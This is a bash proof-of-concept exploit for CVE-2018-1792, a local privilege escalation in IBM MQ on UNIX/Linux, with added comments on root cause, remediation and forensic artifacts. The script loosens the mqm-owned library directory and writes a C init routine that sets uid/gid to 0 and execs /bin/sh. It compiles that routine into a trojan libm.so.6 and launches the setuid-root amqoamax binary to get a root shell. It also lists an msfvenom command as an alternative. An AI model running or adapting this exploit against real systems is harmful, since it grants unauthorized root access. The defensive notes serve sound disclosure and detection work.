#!/bin/bash
# Author: Rich Mirch
# CVE: CVE-2018-1792
# Vendor Advisory: https://www-01.ibm.com/support/docview.wss?uid=ibm10734447
# Product: IBM MQ multiple versions for UNIX/Linux
# Description:
# The amqoamax and amqoampx setuid root binaries are vulnerable to shared
# object injection because the RUNPATH is set to /opt/mqm/lib64 which is
# owned by the mqm user. This PoC will create a trojan horse library that
# executes a root shell when loaded.
#
# Note: This PoC uses libm.so.6 however other libraries can be used
#
# Usage: Execute as the mqm user
#
# Root cause, restated: a directory on the library search path of a
# setuid-root binary is owned by an unprivileged account, so that account
# decides which code the binary loads while running as root. The trust
# boundary crossed is mqm -> root.
#
# Defender notes:
# - Remediation: apply the fix referenced in the vendor advisory above.
# - Hardening check: every directory named in a setuid binary's RUNPATH/RPATH
#   should be owned by root and writable by no other account.
# - Artifacts this script creates or leaves behind (detection / forensics):
#     * /opt/mqm/lib64 changed from mode 555 to 755; the script never
#       restores the original mode
#     * a file named libm.so.6 in /opt/mqm/lib64 while the script runs
#       (presumably not shipped by the product, since the cleanup step
#       deletes it - verify against the package manifest)
#     * the bare temp file created by mktemp, which is not removed (only the
#       ".c" sibling is)
#     * woot.o in the current working directory while the script runs
#     * amqoamax / amqoampx started by the mqm user with a /bin/sh taking
#       over the process
#
#set -x
# mktemp creates an empty file and prints its path; SRC is that path with
# ".c" appended, i.e. a second, separate file.
SRC=$(mktemp).c
DST=/opt/mqm/lib64/libm.so.6
# /opt/mqm/lib64 is 555 by default
# The read-only mode is not a control here: mqm owns the directory, so it can
# change the mode itself. Ownership, not the mode bits, is the flaw.
[[ -w /opt/mqm/lib64 ]] || chmod 755 /opt/mqm/lib64
# You can also use
# msfvenom -p linux/x64/exec \
# PrependSetgid=yes \
# PrependSetuid=yes \
# CMD=/bin/bash \
# -f elf-so > >/opt/mqm/lib64/libm.so.6
# Write the C source for the library. ${SRC?} aborts the script if SRC is
# unset. The heredoc body is the library's whole source: one function that
# sets the real and effective uid/gid to 0 and replaces the process with
# /bin/sh.
cat >${SRC?}<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
setreuid(0,0);
setregid(0,0);
execl("/bin/sh","/bin/sh",NULL);
}
EOF
# Compile to a position-independent object, then link it as a shared object
# written directly to DST. The soname is set to DST's basename and woot is
# registered as the library's init routine, so it runs when the library is
# loaded rather than when a symbol from it is called.
gcc -fPIC -o woot.o -Wall -c ${SRC?}
gcc -Wall -shared \
-Wl,-soname,$(basename ${DST?}) \
-Wl,-init,woot -o ${DST?} woot.o
echo "Executing amqoamax; note: amqoampx will also work"
# The setuid-root binary resolves its libraries through the mqm-owned RUNPATH
# directory (per the description above), which is where DST was written.
/opt/mqm/bin/security/amqoamax
# Cleanup runs only after the command above returns. It removes the object
# file, the C source and the planted library; it does not remove the bare
# mktemp file and does not restore the directory mode.
rm -f woot.o ${SRC?} ${DST?}